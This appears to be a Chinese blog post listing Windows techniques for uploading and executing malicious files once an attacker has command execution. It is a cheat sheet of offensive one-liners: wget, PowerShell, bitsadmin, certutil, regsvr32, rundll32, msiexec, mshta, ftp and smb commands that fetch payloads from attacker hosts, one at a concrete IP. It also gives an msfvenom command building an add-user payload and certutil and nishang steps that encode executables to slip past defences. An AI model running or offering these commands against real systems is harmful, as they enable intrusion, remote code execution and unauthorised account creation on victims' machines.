windows命令执行上传恶意文件总结

wget

1
wget http://xx.xx.xx.xx:8080/shell.txt -O x.php

powershell

命令执行权限时

1
2
powershell -Command "$client = new-object System.Net.WebClient;$client.DownloadFile('http://144.34.191.182:8000/1.exe', './2.exe')"

bitsadmin

1
bitsadmin /transfer n http://xx.xx.xx.xx:8000/x.txt d:\1.exe

certutil(我自己比较常用)

下载文件

1
certutil -urlcache -split -f http://xx.xx.xx.xx:9090/config.txt error.exe

删除缓存

1
certutil -urlcache -split -f http://xx.xx.xx.xx:9090/config.txt delete

regsvr32

1
regsvr32.exe /u /n /s /i:http://xx.xx.xx.xx:8888/file.sct scrobj.dll

rundll32

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://xx.xx.xx.xx:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

msiexec

远程下载msi恶意文件执行,msi类型的payload可通过msf生成

1
msfvenom -p windows/adduser USER=test1 PASSWORD=passwd1 -f msi -o up.msi
1
msiexec /q /i http://xx.xx.xx.xx/xxx.msi

mshta

1
mshta http://xx.xx.xx.xx/run.hta

ftp

传入如下文件ftp.txt

1
2
3
4
ftp 127.0.0.1
username
password
get fileexit

执行

1
ftp -s:ftp.txt

smb

创建公网共享

连接

1
net use xx.xx.xx.xxtest$ /u:test test

下载

1
copy xx.xx.xx.xxtest$test.exe c:

echo

直接写入

1
echo "xxxxxx" > 1.php

base64并用certutil解码

编码

1
certutil -encode xxx.exe base64str.txt
1
2
3
echo "base64str" > base64str.txt

certutil -decode base64str.txt xxx.exe

利用nishang工具包

如利用nishang中的ExetoText工具编码

将exe转化为txt

1
ExetoText.ps1 evil.exe evil.txt

将其echo写入

1
echo "xxxx" > evil.txt

解码

1
TexttoExe.ps1 evil.text evil.exe

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!